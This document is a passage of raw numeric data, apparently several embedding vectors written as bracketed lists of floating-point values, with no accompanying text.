0.015079201,0.06793941,0.03152111,-0.050194904,0.01017586,0.0014098329,-0.047191788,-0.037040908,0.020475388,-0.020297691,0.004861475,0.003954739,0.059727885,-0.00524891,-0.061716188,-0.017364822,-0.029938566,-0.024292545,0.017160881,0.024610864,0.011417276,0.0020382667,0.014405979,-0.005772613,-0.0040923418,0.0058573196,0.012077984,-0.03880356,-0.032913744,-0.022491701,0.018932782,0.019099187,0.0046247453,0.038810328,0.06279713,0.0072739855,-0.0013077828,-0.013311607,-0.005726754,0.08303752,-0.051955123,-0.04872455,0.0039482573,0.0013788464,0.021729242,0.027296957,0.00656028,0.0054505644,-0.054199714,-0.002250773,0.013763585,-0.034292,0.05969677,0.004599068,-0.051899064,-0.037494633,-0.018666472,-0.050855227,-0.00030080593,0.056820933,-0.07214119,0.028968787,0.0062303147,0.03825365,0.05278846,-0.06518445,-0.016141305,0.013319313,-0.022539703,-0.049505528,0.022251062,0.02784846,0.030073507,0.022923354,0.034070857,0.0061552883,-0.037493505,0.033513352,0.0259733,-0.030492157,0.023031924,-0.009781135,-0.052741688,0.028018879,-0.050898533,0.012497418,-0.0655349,0.037924595,-0.035645694,0.004026495,-0.0040962393,-0.046716545,-0.067892015,-0.04444745,0.029410077,0.04851925,0.03450945,-0.03889715,-0.0513279,-0.003498843,-0.027622249,-0.009762748,0.012976818,0.060096037,-0.042215936,0.019362802,-0.028994806,0.0040594665,-0.0059191845,0.025915105,-0.0181219,-0.04608994,-0.0724393,0.040221818,-0.035282314,0.025927952,0.03721283,0.009473166,-0.0149523,-0.054995857,-0.019845745,-0.03273629,-0.040209103,-0.001075177,-0.02706086,0.022591,-0.008123367,-0.017639166,-0.02312249,-0.00933653,-0.044315837,-0.012357356,-0.093128785,0.001863289,0.04000719,0.030573498,-0.054218043,0.03442899,0.032588664,0.029058209,0.023802062,-0.006650038,-0.011142227,0.0438956,0.04681547,-0.03126636,0.018425463,-0.009462216,-0.012121091,0.048843365,-0.03708101,-0.03821083,0.011039913,-0.015095681,-0.026532028,0.07524568,-0.036655627,0.025751129,-0.0036955678,-0.05386869,-0.043659046,-0.04174212,0.039396904,-0.037874058,-0.020198312,-0.023829704,-0.016887246,-0.095850095,0.028552366,0.005193831,0.023943247,-0.024076328,0.017022053,0.064748995,-0.027351502,0.005239232,0.032468338,0.06534209,0.009384816,-0.03312131,0.07832422,0.035986267,-0.010231942,0.067888916,0.07473454,0.028308336,-0.0176173,-0.0114103425,-0.0026560707,0.02475262,-0.015264725,-0.048152156,0.01581128,0.0030896144,-0.0015599926,-0.030307874,-0.0036113493,0.01954587,-0.010184294,0.0016955554,0.028306957,-0.0042266785,-0.03289747,0.03636865,0.02081588,0.028906403,-0.03411548,-0.0035042593,-0.00696295,0.06612805,0.05025164,0.010786886,-0.019870404,0.03868499,0.009434028,0.058671523,-0.04467314,-0.015302088,-0.04534028,0.061383512,-0.036524497,-0.05636379,0.010437658,-0.02197902,-0.05488111,-0.05200014,-0.039996292,0.005895607,0.011230259,-0.014043471,0.020683903,-0.023494532,0.065796204,0.0053722286,0.00540443,0.0075305277,0.0037890077,-0.0045907637,0.012555874,0.05496724,0.024265364,0.021811187,-0.048758086,-0.01173256,0.02876294,-0.020696718,0.023611251,0.014930671,0.034569398,0.02895412,-0.025564667,0.052634668,0.03716424,0.045771368,-0.018639835,-0.04612688,0.002495886,0.00067627063,-0.01897542,0.015696006,-0.04629833,0.022092858,0.030838156,-0.04264507,0.013329151,-0.0038842661,0.04947745,-0.0009569302,0.045179795,-0.009255167,0.010921521,-0.053564142,-0.0013405851,0.0009220231,0.059102096,-0.027619047,0.008163498,-0.0034131128,-0.036601797,-0.02935792,0.06745941,0.016018929,-0.0495978,0.0029552998,-0.020704523,-0.008088912,0.039837163,-0.044589,0.008525154,0.015723605,0.01214665,0.12061016,0.017970348,0.017228093,-0.031032344,0.05676786,0.011978125,-0.031344563,-0.048656076,-0.010669371,-0.028754039],[0.023437629,0.09117688,-0.16213009,-0.07604241,0.07800314,-0.0015459947,0.035346713,0.042987168,-0.029586928,0.012560491,0.0028823975,-0.0044621197,0.103434764,0.03420321,0.011686943,-0.002435952,-0.011596961,-0.09340868,0.004215006,0.06296041,-0.020834776,-0.04485315,0.015738249,-0.0414344,0.030400168,0.042751778,-0.03340107,-0.02906226,-0.05232259,0.0060359314,-0.0013016859,0.011976652,-0.05272997,0.016878195,-0.06573686,-0.030869726,0.01442387,0.018813096,0.012744945,0.02287049,0.045347825,0.0040952875,-0.01617763,-0.031086965,0.00038336607,0.019750567,0.0029116091,-0.004402626,0.07313219,-0.07139456,0.03696741,-0.035798024,0.062294323,0.026706912,0.09023933,0.07596569,-0.052363947,0.0043886043,0.003897871,-0.058830027,0.085907586,0.04369341,-0.08802872,0.07481684,-0.0117441425,-0.018220788,-0.047492832,0.024747198,-0.0044169365,-0.061089374,0.019070657,-0.029374573,-0.020924082,0.03052028,-0.067015104,-0.0052987863,-0.042566203,-0.0107365055,0.004778818,0.05960315,-0.00891245,-0.023410717,0.07441836,-0.0065633417,0.009551133,-0.038745325,-0.026399804,-0.012643954,-0.017586723,0.07614255,-0.009781513,-0.0007897118,0.011565214,-0.009748442,-0.052786916,-0.016824406,-0.006072699,0.016156618,-0.037411567,-0.011294036,-0.046522856,-0.006532526,0.009931891,0.0103965625,-0.0062865308,0.043429397,0.023252467,-0.0132773165,-0.017028827,-0.04309001,-0.018879216,0.055486925,-0.022279818,-0.011056542,-0.044693526,-0.016012752,0.046927687,-0.00038863256,-0.039926827,-0.01580236,0.0088550765,-0.044286914,0.013944066,0.016090488,-0.022263333,0.010182374,-0.01596104,0.019114405,-0.024021456,-0.025632786,-0.018680679,0.009732345,-0.06778032,-0.0026897318,0.02638722,0.087847106,-0.03776773,-0.03400623,0.016915405,0.015179016,0.002035422,0.029140295,-0.03351743,-0.018955749,-0.0060952553,-0.07706394,-0.02551772,-0.0008842614,-0.012537751,0.00903319,-0.004755703,0.027358655,-0.027705258,0.0018964292,-0.003059055,0.024106938,0.042439256,-0.0023163601,-0.013430384,-0.0014265145,0.045187395,0.0025959094,-0.069036365,0.049903993,0.02081706,-0.013795268,0.0021927329,0.016584838,-0.014032963,0.020579442,-0.061853964,-0.0009456045,0.021813514,0.0022944792,0.012037141,-0.02905661,0.061047677,-0.02200759,-0.00029645374,-0.074288726,-0.005458059,-0.040248927,0.03432224,-0.0082180295,-0.018872261,-0.013193907,-0.007021235,-0.00952216,0.023785852,-0.036776282,0.008014404,0.026934108,-0.045203373,-0.0005829058,-0.011683551,-0.04931121,0.042895865,-0.002737007,0.04700665,-0.016483793,-0.046948485,-0.014163409,-0.05800514,0.03155336,-0.05849527,0.0673963,-0.0015062232,0.03705187,-0.040769454,0.070541136,0.072155796,-0.007572006,0.000028663391,0.00055295316,0.0068779653,-0.016602464,0.0042642984,-0.0162408,-0.015684783,0.003760657,0.006558867,-0.020091224,0.0077615227,0.03807986,0.018423157,0.0044753053,-0.057460938,-0.014229265,-0.03134463,0.0019471463,0.00014615935,-0.101017214,0.049783688,-0.016535688,0.005018003,0.063470006,0.002347927,0.043292556,0.010072651,0.05200534,-0.0014052942,0.029849816,-0.031736307,0.0047895033,-0.03489412,-0.025901604,0.00352212,-0.042502128,-0.036575798,0.07374832,-0.0076451795,0.015508355,0.015064726,0.020014873,0.030522259,-0.009057924,0.020224554,0.031002233,0.03697097,0.04158703,0.017416509,-0.037793778,-0.026483886,-0.022603218,-0.064996496,-0.018523535,-0.038696304,-0.013092109,0.023091182,0.00039535007,0.043645933,0.03854214,-0.0027258168,0.032662276,0.008487092,0.061269786,-0.02193092,-0.014400923,-0.005248698,0.011488955,-0.06127437,-0.012587171,-0.021384956,0.009397501,0.03808582,0.012199533,0.027902633,0.005880219,0.013864524,-0.008837119,0.012132101,-0.00034489483,-0.055407446,0.022114467,0.0028436938,0.031033935,0.016607886,-0.006753315,0.033400934,-0.08944394,0.03208679,0.033735886,0.048029635,0.064847365,-0.028111733,0.012654883,0.01015771,-0.011115244,0.0047563766,-0.040652093,-0.040965542,-0.012810234,-0.05324426,-0.012533404,-0.007838326,0.008520099,0.05750324,0.03011156,0.028651228,0.009050606,0.027327491,-0.033713706,-0.017546058,-0.057793483,-0.017611405,0.081606835,-0.02987659,0.008151141,-0.01549114,0.016274618,0.038075168,0.05259485,0.02276533,-0.03679335,-0.045842625,0.0013820722,0.018498342,0.0070863776,0.03647093,0.03039767,0.029279497,0.033409253,-0.017419895,0.005236712,-0.002258398,0.025956417,-0.020950297,-0.049607195,0.04475281,0.031922683,0.009003309,0.019778755,-0.015592035,-0.0363253,0.010994301,0.026697949,0.032432433,0.065708466,0.019331077,-0.024388604,0.06334887,0.03300914,0.018514642,-0.019202583,0.0054199114,0.027644752,0.010999831,0.016562622,-0.01240193,0.0127222575,-0.02504585,-0.036384895,-0.02042517,0.030739062,-0.012319873,-0.0037035411,-0.06071928,0.014320838,-0.0032142843,0.02929351,0.028897604,-0.015618964,-0.019557133,-0.015137354,0.011660421,-0.009484072,-0.00036025004,-0.054108042,0.029036656,0.026138205,-0.008502437,-0.023381101,-0.03579531,0.02636488,0.007815188,-0.03332517,-0.022139175,0.022663297,-0.03573668,0.05318541,-0.025500644,-0.06137503,0.024029212,0.029386172,-0.043247934,-0.001898999,-0.043378197,0.009030112,0.019051373,-0.014965782,0.04027247,0.035391156,-0.027417045,-0.059251674,0.014272148,0.0058057867,0.04491021,-0.043826666,-0.01174129,-0.03850247,0.009639558,0.0264666,0.015472908,0.003328529,0.03687748,0.04006489,-0.0038406854,0.032055296,-0.026858842,-0.038135335,0.0661805,0.015621772,0.049000375,0.036239646,0.0073659224,0.010867483,0.015916308,0.079436004,0.023097124,0.057976343,0.025829995,-0.05583221,-0.025932519,-0.03672632,0.017026221,0.052582107,0.019162938,0.008527517,-0.087931156,0.0457221,-0.015133365,0.009537344,0.022365145,0.01855581,0.10383069,-0.018820088,-0.0027052842,-0.0031088784,0.0153856175,-0.0042427685,-0.016890237,0.045226876,-0.087666646,0.042469744,0.012152699,-0.029757438,-0.0112619,-0.051570453,0.03891414,0.033439394,-0.034718458,0.031029077,0.01250424,-0.008728814,-0.023173962,0.043103334,-0.03787287,0.0040238355,0.014736502,0.08273684,0.008319705,-0.05287598,-0.030905172,-0.048151325,-0.000609379,0.054141667,-0.008107312,-0.026691252,-0.010225534,-0.018993462,0.034287542,0.0060507767,0.026731215,-0.0261937,-0.052478455,-0.025195237,0.016280819,0.02958692,0.033342652,0.032039158,0.008864355,0.066241995,-0.010512289,0.0024707075,0.019333748,-0.0066501405,0.056160673,-0.017717255,-0.06604786,0.049371146,0.018239977,0.00546387,0.0283985,0.031220464,0.05286533,-0.05874376,0.023477668,0.04024274,-0.043308485,0.027598388,0.05570218,-0.042658355,-0.04174829,-0.013354028,-0.063772514,0.029993529,-0.009520962,-0.10404703,0.0152121065,0.023023961,0.020874778,0.036039963,-0.06639933,-0.04064287,0.015403775,0.013276059,-0.030964756,-0.003845278,0.022862282,0.038219977,0.0013724699,0.059855416,0.028136212,-0.001502209,0.04598505,-0.0132451365,-0.011015511,0.030626547,0.04842283,-0.097592205,-0.002392221,-0.051258355,0.00024447724,-0.016116234,0.013137983,-0.031172128,0.006142584,-0.033245683,-0.029802823,-0.052049395,-0.027774919,0.014357623,0.06346122,0.015325243,-0.033515856,-0.03968234,-0.019414488,-0.024658296,-0.0005999257,0.03934742,-0.001500943,-0.061917607,0.03554625,-0.0075949226,-0.01898067,-0.0093100965,0.0402426,0.0031726952,-0.0464987,-0.11357343,0.027235234,-0.047112502,0.050634537,0.04870206,-0.006450771,-0.02742297,-0.09208806,0.017053908,-0.011123847,-0.04064364,-0.003356255,0.0062664016,0.035808027,-0.030678703,-0.026238598,-0.02244603,0.023648925,0.007179422,-0.05827213,-0.06652899,0.0032425763,0.04222476,0.05101741,-0.053868838,0.047198012,0.059068203,0.0030276086,0.045914806,0.0031197404,-0.01968737,0.005671379,0.06304003,-0.012250379,-0.015557381,0.0056535224,-0.05867368,0.037009794,-0.010697359,-0.008055341,-0.04719328,-0.008977465,-0.030545888,0.083398454,-0.0509235,-0.0026969013,-0.0283547,-0.00374521,0.004595981,0.009940851,0.011009505,-0.08740727,0.025926458,-0.017024443,0.022664793,-0.066353,0.018165868,-0.013185509,0.03296602,0.00009064594,0.047461078,0.046420716,-0.021295907,-0.011278214,0.024305314,0.018855615,-0.032997373,0.021843506,0.06726382,0.019384135,0.008416503,0.091347955,0.08183645,0.021621184,-0.037984546,0.004422815,-0.0037451186,0.024539486,-0.014216883,-0.0012051043,0.018685097,0.013386823,-0.025451893,0.027623707,-0.021729182,0.023083707,-0.012325729,-0.02137989,0.036488283,-0.01553472,-0.01824478,0.05465729,-0.0014157767,0.0055206623,-0.04244409,0.011261474,0.026970861,0.004040411,0.021648413,0.01169146,-0.026982134,0.015740972,-0.003897062,0.029111642,-0.054667283,0.0021350784,-0.042466886,0.013869179,-0.01902442,-0.051982466,-0.026151216,-0.026435101,-0.045401834,0.006800256,0.010669031,0.013392944,0.04792047,-0.0035116663,-0.005521196,-0.011010679,0.0601873,0.024371564,-0.008832591,-0.007528937,0.011448087,-0.01881712,0.01222496,0.009235256,0.019591687,0.019021291,-0.068468384,-0.021993442,-0.008774228,-0.051234405,0.011611467,0.04072695,0.016986683,-0.012404577,-0.039499972,-0.000018043736,-0.01904808,0.007947733,-0.03505932,-0.029379832,-0.021609053,0.015474467,0.004408646,0.05871034,-0.076889284,0.0066199233,0.0028966074,0.014626277,-0.025785068,-0.029881332,0.07995632,-0.01455614,0.025583778,-0.0033249806,-0.0070751985,-0.08006085,-0.031900555,-0.0608218,0.02733176,-0.027400186,0.0054133497,-0.020589957,-0.033324793,-0.04259544,0.071772166,-0.0016469731,-0.036176916,-0.015174952,-0.020092342,-0.02205915,0.0032178697,-0.0071942694,0.010731083,0.045454156,0.027222034,0.13000715,0.0055033746,-0.006006098,-0.021016216,0.055682324,-0.010246159,-0.06672668,0.004808064,-0.029031884,-0.043382138],[-0.007721177,0.07533858,-0.18383451,-0.04100649,0.12118753,-0.028995538,0.07801104,0.003292637,-0.026878884,-0.024582937,0.015319719,0.026963064,0.077609375,0.018452609,0.0067015374,-0.021659506,0.029136261,-0.08586137,-0.018122448,0.01852082,-0.023593465,-0.005092558,-0.012619658,-0.048451796,0.04850203,0.010022303,-0.06122073,-0.015244066,-0.012380827,0.03131538,0.041424852,-0.09094431,-0.016791562,-0.007648791,-0.07625499,0.008794162,0.062511876,0.009422848,0.023444783,-0.035350468,0.05758439,-0.009151025,0.04775555,-0.0044721556,0.015648779,0.0110887,0.022729246,0.0057399273,0.04719802,-0.057219476,-0.025953472,0.02362603,0.043801706,0.03917365,0.090344936,0.052989345,-0.0032349096,0.04204738,-0.016748805,-0.04323294,0.07305959,0.07703746,-0.07693644,0.052592427,0.0055449787,-0.0365641,-0.018674685,0.05819849,0.00028812536,-0.009483019,0.008318808,-0.019234646,-0.02828864,0.03006838,-0.055156868,-0.03726633,-0.0038695182,0.010161922,-0.023537917,0.032059807,0.036564987,0.006793482,0.07041582,0.0019555998,0.026172584,-0.040254854,-0.055455506,0.008282571,-0.017669726,0.10305255,0.02159567,0.022396838,0.0152801275,0.005791881,-0.042215258,0.04340911,-0.01223987,-0.00068860216,-0.03560809,-0.0041023004,-0.02424919,-0.006281373,-0.014818625,-0.002221314,0.018280203,0.027694765,0.009141348,0.004283432,-0.03711581,-0.009701621,-0.050577924,0.037273053,-0.050055318,-0.00473052,-0.028821241,0.007315686,0.011775655,-0.0056416458,-0.011549775,0.037389647,0.004840378,-0.037053708,0.018079458,0.04092536,-0.0063245273,0.015531628,-0.08784501,0.02704579,-0.016092697,-0.030584635,-0.016167663,-0.031594705,-0.0431594,-0.003212778,-0.0074424306,0.08486906,-0.0559629,-0.00032126912,0.027824597,0.06824636,0.02161353,0.041839503,-0.023341957,-0.021096684,-0.016808553,-0.026435543,-0.0029351464,-0.019232292,-0.06674742,0.05553727,0.018782474,0.03179782,-0.012945831,0.021548878,0.02737519,-0.010523599,-0.0054917596,0.012900119,0.029039599,-0.031734817,0.031061469,0.021658117,-0.046862066,0.012585371,0.0052276724,-0.062244885,-0.0012951954,0.021602577,0.0002863185,0.049844988,-0.098732516,-0.039209057,0.025318235,-0.010485043,0.0072592264,-0.01359093,0.07754859,-0.011009361,0.01462085,0.0009941302,0.04024401,-0.046183754,0.046823576,0.01567633,-0.02044798,-0.028302023,-0.008546636,0.015551583,-0.025157006,-0.047337804,0.009056223,-0.021510277,-0.039269455,-0.045601934,-0.03073338,-0.04506909,0.029417183,0.0023847953,0.040423095,-0.014336596,-0.04461007,-0.017434387,-0.023982128,-0.0033226388,-0.04272195,0.066350885,0.017936822,0.013804991,-0.012841295,-0.00024640674,0.04432305,0.026459226,0.07071691,0.033840444,0.026304897,-0.0036154822,-0.00847379,-0.02102456,-0.011799077,0.0063457508,0.006065857,-0.025853826,-0.026838548,0.00038110954,0.0020784508,-0.020243932,-0.019247703,-0.0150642535,-0.030345555,0.024962427,0.020769848,-0.08131989,0.04502852,0.014838054,0.038954463,0.02644612,0.005586651,0.039843865,0.013025182,0.05316617,0.040248364,0.05200533,-0.019125871,-0.011975363,-0.03768693,-0.044061467,0.0008209006,-0.049189527,0.011694419,0.017931746,0.013060742,0.027407132,0.02398489,0.013663772,0.031127205,-0.009002463,-0.012314981,-0.00663535,0.075315274,0.014734304,0.0377909,-0.037316754,-0.0003772146,-0.016177189,-0.025581252,-0.014437013,-0.05358304,0.004072572,0.0124590825,-0.0015146061,0.042466737,0.0006657254,0.021093493,0.034671552,-0.0080547,0.011304217,-0.012085371,-0.012958826,0.0007559682,0.016136669,-0.024900429,-0.056195132,-0.03664634,0.028888421,0.02171002,0.028789336,0.004672253,0.00198958,0.023131767,0.012048604,-0.0034797383,-0.0027280503,0.015643427,0.04673852,-0.013869411,0.0122458935,0.06342413,-0.032783933,0.034188386,-0.046743553,0.031119721,0.040001217,0.050985567,0.00074831006,-0.007666414,-0.022431474,0.03121379,0.029150875,0.02754964,-0.012190062,-0.08985419,-0.032405157,-0.0648106,-0.033736274,0.0059815836,-0.044425815,0.032708943,0.039344523,0.054464567,0.009011589,0.030410904,-0.036653996,-0.04253556,-0.050030466,-0.028900776,0.0672876,-0.017697064,-0.013124895,0.0062530152,-0.032551564,0.04843802,0.05018739,0.042201262,-0.009716296,-0.0031329175,0.007584922,0.024756424,0.017422143,-0.025982782,0.059326347,-0.008750496,0.008617484,0.040813982,-0.01546596,-0.022274293,0.01729877,-0.016138412,-0.02230988,0.009570547,0.021089794,-0.015688231,0.034349717,-0.028480588,0.025279697,0.046980888,0.014701593,0.02998833,0.03508584,0.022679342,-0.03497333,0.040375575,0.0171785,-0.013230919,0.0018084274,-0.020478418,-0.010894172,0.041736018,0.0005081022,0.03742253,0.022863481,0.011603496,-0.0045807553,0.02316598,0.025205381,-0.031026214,0.02244133,-0.047054444,-0.012749717,-0.0005667029,0.004263566,0.020324875,0.0012623962,-0.013423415,-0.012158075,0.02486464,-0.009645571,0.051017854,-0.053142708,0.034670014,0.01883473,0.0060503916,-0.029865943,-0.03972209,0.011067641,0.024306104,-0.061815497,0.030631827,-0.0015858051,0.0053301733,0.05570044,-0.05038488,-0.051064316,0.0074054548,-0.00058453484,-0.03194378,-0.0042986176,-0.03931694,0.004854384,0.039303377,0.0048215995,0.051298425,0.025787655,-0.0736161,-0.07994584,0.0010867133,0.047015507,0.03314238,-0.01778645,-0.030065397,-0.037952982,0.007894211,0.029701084,0.025288817,0.0054085213,-0.0019089942,0.055737015,0.043673314,0.013397494,0.014581389,-0.035064913,0.063222356,-0.02168878,0.0058053434,-0.009625866,-0.011187898,0.017652838,0.026314188,0.054784022,-0.031187197,0.035161324,0.028343353,0.00063273817,-0.03961607,-0.049133155,-0.018616628,0.04792241,0.069794044,-0.040174935,-0.05837994,0.040310383,-0.0011227172,0.028270936,0.032082967,0.025599431,0.07915198,-0.015172513,0.021590771,0.017010758,0.0074375495,0.025104726,-0.0030369677,-0.011435612,-0.08055556,0.025642173,0.025416458,-0.008305678,-0.0148747,-0.06678548,0.06709108,0.09371558,-0.04647822,-0.01756805,0.044580996,-0.047609664,-0.020710113,0.03383891,-0.037736505,0.0061897533,0.0004980376,0.058009785,0.026357977,-0.020978065,-0.0332012,-0.022710321,-0.030702308,0.038141176,0.020129215,-0.026490122,-0.0071790577,-0.01325176,0.03846354,0.020036343,0.0058504916,-0.039762657,-0.050711688,-0.028758569,-0.015637772,0.057037704,0.028984914,0.024909208,-0.017784521,0.082614474,-0.008122402,-0.028764322,0.04831437,-0.01394108,0.031184554,-0.10738148,-0.066278,0.001665152,-0.0316613,0.015172213,0.015200894,-0.0031145643,0.038008638,-0.01017346,0.040586848,0.005467679,-0.052738607,0.024220267,0.05317901,-0.01768524,-0.012460639,-0.014116389,-0.06771459,0.011627981,0.015595164,-0.10685987,0.01286237,-0.013164063,0.035857968,0.009050873,-0.03359806,-0.00095526734,0.01754777,-0.00097056275,-0.026994925,-0.015933096,0.032057963,0.00747667,0.016144546,0.03450267,0.033089753,-0.053515546,-0.004905164,-0.008050517,-0.065536335,0.037577447,0.010755019,-0.100906335,0.038218852,-0.062969625,0.011066193,-0.031529553,0.010481989,-0.0015750041,-0.034382284,-0.025778541,-0.02933277,-0.04358678,-0.024542432,-0.0061137304,0.06647436,0.02640601,0.016886653,-0.036400363,-0.03621108,-0.002304806,0.008079756,0.009824396,0.013102598,-0.07044318,-0.0037521406,-0.009174895,-0.0033720292,0.0012849702,0.014702613,0.018317703,-0.016859116,-0.065953165,0.06633489,-0.056647684,0.0105402125,0.035381757,0.009933624,0.012913078,-0.07221166,-0.010162973,-0.012407006,-0.048803456,-0.049448553,0.03570884,0.043662135,-0.07111656,-0.005972373,0.024393832,0.01742624,-0.007359333,-0.061318,-0.062951215,-0.0051505836,-0.009139439,0.054249268,-0.042435687,0.038594864,0.07995206,-0.012221911,0.028610287,0.011559546,0.013046169,-0.0016361512,0.017511962,-0.028231928,0.036959786,-0.011805813,-0.08523208,0.089736015,-0.033373237,-0.0060725464,-0.04231923,-0.028356561,-0.042367596,0.036002804,-0.034692667,-0.004754161,-0.0329589,-0.023353493,-0.018788164,0.009240998,0.007290514,-0.047221694,-0.028499076,-0.017413473,-0.0011921864,-0.06921596,-0.002833232,0.009405187,0.017656421,-0.022002589,0.07448552,0.021906897,-0.020950334,-0.04649461,0.028548129,0.06119016,-0.039212625,0.038314734,0.053363774,0.035838947,0.0020254222,0.058769614,0.07839113,0.0022366669,-0.006082759,0.0009833756,-0.05975549,0.021837397,-0.023368053,-0.0058168783,0.007609249,-0.0228897,-0.02406975,-0.009206106,0.0057117804,0.0142292585,-0.039600816,-0.036497325,0.023200711,-0.01950426,-0.01923239,0.05703939,0.01986526,-0.003733032,-0.043107327,0.024291562,0.03858329,0.005761698,0.021621214,-0.02363069,-0.043715864,-0.03589679,-0.011183499,0.040733725,-0.030931255,-0.0033761056,-0.0307718,0.0067569506,-0.03830668,-0.014807934,-0.033370912,-0.010586273,-0.03755952,0.006805329,-0.028281994,0.013617602,0.030450707,-0.011828495,-0.039027568,0.011357903,0.04326785,-0.02632131,0.013740913,-0.027980397,0.043429725,0.017482223,0.011600758,0.01560637,0.011781227,-0.019609382,-0.05651593,-0.03332589,-0.010698705,-0.055963155,0.053933863,0.018900754,0.0018270925,-0.012983995,-0.018312618,-0.0021996968,0.06459041,0.04549786,-0.0036820588,-0.056259528,0.01122345,0.01132448,-0.015790962,0.021474458,-0.049470976,-0.016395958,-0.004328831,-0.01876049,-0.020934422,-0.056467418,0.0668484,0.025483353,0.022820907,0.02174008,-0.021368813,-0.057647564,0.014881475,-0.03999161,0.0035158275,0.0013804716,0.012619531,0.0036074948,-0.013605152,0.010011177,0.059209082,-0.034049366,-0.053983156,0.009523623,0.03205508,-0.037992675,-0.032503236,-0.05060425,0.03952318,-0.00080022705,0.02986326,0.12537408,0.047379505,0.0035872823,-0.017626075,0.058451023,-0.028091585,-0.033501484,-0.010561478,-0.03956384,-0.020160476],[0.026126932,0.040164072,-0.16158563,-0.0509463,0.062026348,-0.017007174,-0.01177207,0.038203456,-0.0020577852,0.0008180783,0.03169721,0.0019360991,0.06245574,-0.028955892,0.004232041,0.007335731,0.0021377292,-0.0680544,0.00067965937,0.031816084,-0.018688539,-0.04979513,-0.0467052,-0.049453124,0.069297045,-0.0027801944,0.0533231,-0.010917218,0.008182789,-0.03082794,-0.019286774,-0.0133787,0.027571676,0.013434278,-0.018857278,-0.048068915,0.024500407,0.019448748,0.00004609955,0.034069177,0.037072305,0.03395336,-0.038938757,-0.030452231,0.049344007,0.019207932,0.0028997536,-0.01965911,0.0821132,-0.014808045,0.037895355,0.011924413,-0.0032697404,0.020094994,0.09748593,0.03619975,-0.032390505,0.051853266,-0.0715535,-0.051988423,0.086914286,0.07978877,-0.023225194,0.07356772,0.087065086,-0.069459975,-0.01852277,0.0380797,0.038648777,-0.023898425,0.046499804,-0.017232934,0.03500084,-0.015228282,-0.015268892,-0.044390883,0.010680632,-0.003720537,-0.026445452,0.046080116,0.005549394,0.0025141311,0.059648428,0.014969741,0.08353259,-0.022766888,-0.057248544,-0.028381903,-0.027436465,0.060631197,0.054841973,-0.013953097,0.0037654326,-0.0058306297,-0.026031692,-0.0023184936,0.01343332,0.05920164,0.0130951265,0.0016548327,-0.03556131,-0.04619623,0.026704872,0.030752704,-0.011280433,0.032294866,0.015518339,0.044639125,-0.043427322,-0.002952952,-0.045155946,0.042648613,-0.013597576,-0.019489422,0.0063138837,-0.06363523,0.0576576,-0.01224916,-0.0010386056,0.0669731,0.00091823714,-0.04585824,0.017301077,0.055140655,-0.021858562,0.008081532,-0.031645257,-0.008259917,-0.035273667,-0.026843563,-0.024064314,-0.033967998,-0.03282994,-0.014098733,0.015666667,0.034452137,-0.044347,-0.0070134276,-0.0045115333,-0.010801903,0.0029381658,0.023408636,-0.016372737,-0.0013609971,0.0075713475,-0.02541386,0.039140794,-0.062676065,-0.0011996941,0.041633673,0.03100334,0.009231959,0.011579609,0.00048838946,0.015440567,-0.036143444,0.00032697828,-0.020951223,0.0021833424,0.02741046,-0.023642888,0.015404579,-0.079988964,0.06433269,0.0077599734,-0.04389893,-0.008850342,0.0552201,0.020687709,0.04939046,-0.07108755,-0.012822645,-0.03314269,0.014628441,0.062034883,-0.027339268,0.040986285,-0.004101438,0.040074747,-0.035904672,0.019664314,-0.05018274,0.0027030127,0.02110771,-0.018767614,0.010483196,0.037295483,-0.06569246,0.010887211,-0.022862496,0.011646904,0.03665957,-0.052073546,-0.055654857,-0.054738965,-0.06665652,-0.0010106709,0.020957835,0.035850674,-0.014330957,-0.029117072,0.0027265307,-0.043329388,0.030610919,-0.04493594,0.024152588,-0.013717327,-0.009704427,0.025132662,0.0363815,0.05435631,-0.037041094,0.019317947,-0.003570025,0.03622984,-0.045618262,-0.012475607,-0.030773196,-0.027925495,0.011994426,0.029728457,0.03272012,0.047674734,-0.049816,0.04216596,-0.024454262,-0.066482805,-0.018131973,0.04786756,-0.03057713,0.018106958,-0.09744329,0.034960795,0.004671207,0.0064783674,0.051363777,-0.02498517,0.056974173,0.0024104584,0.0002939759,-0.010541901,0.05571142,-0.016101405,-0.0050809192,-0.019130586,0.0010937992,-0.0019425473,-0.031191023,0.0049269195,0.061649997,0.043066632,-0.025599571,0.04780963,0.04025069,0.0138268685,-0.026402397,-0.038120463,-0.020454625,-0.0060578855,-0.000116975825,0.060030106,-0.04403705,0.012370706,-0.05177066,0.002688518,-0.01874898,-0.03339441,0.02521903,0.034829605,0.022677392,0.02618013,0.045808233,-0.0013433024,0.044235785,0.008967797,0.041630466,0.0018868252,-0.032278042,-0.07592393,0.0039870543,-0.013721074,-0.011064883,-0.0045294594,-0.01250396,-0.00054361654,0.017834054,-0.020318083,-0.011249759,-0.019714033,0.016074209,0.018740816,-0.027172046,-0.046659198,0.01938261,-0.03453626,0.05480822,0.04170124,0.016848885,0.039574675,-0.036879648,0.0521708,0.024936864,0.07182473,0.05831361,-0.0011777725,-0.010040022,0.015336763,0.014559234,0.010975856,0.009490859,-0.04920072,-0.029144326,-0.018290073,0.020330194,-0.05632114,0.009513337,0.019634567,-0.020903256,0.047963064,-0.033463392,0.009564699,-0.036894515,-0.003269856,-0.042900812,-0.0041512824,0.042957187,-0.0026512914,0.008182487,0.032894768,-0.017049195,0.026219506,0.0623403,0.05036588,-0.030535376,-0.06118633,0.07246279,0.005432181,-0.010816855,0.018306939,0.066162676,0.103141695,-0.035025775,0.041109446,-0.037646182,-0.019044524,-0.022378681,-0.025532601,0.00071137067,0.03749752,0.028571382,0.027255528,0.014883997,-0.0035127301,-0.047857776,0.014852199,0.019577248,-0.0093597155,0.061385073,-0.009490339,-0.042615663,0.03492354,0.03267577,0.053850926,-0.03239667,0.0040821447,0.007882966,0.04538815,0.0019842533,0.031788908,0.061274063,0.032775987,-0.0059579383,0.011176902,0.025108956,-0.022871466,0.032915927,-0.097852886,0.01348384,-0.02095543,0.043942753,0.010912743,0.003230738,-0.012903423,0.03520584,0.033550486,-0.014830976,0.049700137,-0.021153338,-0.0077644195,-0.0068651815,0.004393062,-0.040777765,-0.034983154,0.009001111,0.028007763,-0.05163191,-0.042181604,-0.0229561,0.033686716,0.037428726,-0.032686282,-0.055980034,0.014263274,0.00353018,-0.028378999,0.04415195,-0.0145292515,-0.030603237,0.07918631,-0.0030224596,-0.001582825,0.0070820753,-0.01808516,-0.021630375,0.027138472,0.04692164,0.011301515,-0.016152466,-0.015478166,-0.028976195,0.033453308,-0.012298498,0.04289105,0.020588797,0.012025854,0.030285878,0.07492091,0.023180626,-0.011561247,-0.05805927,0.036955673,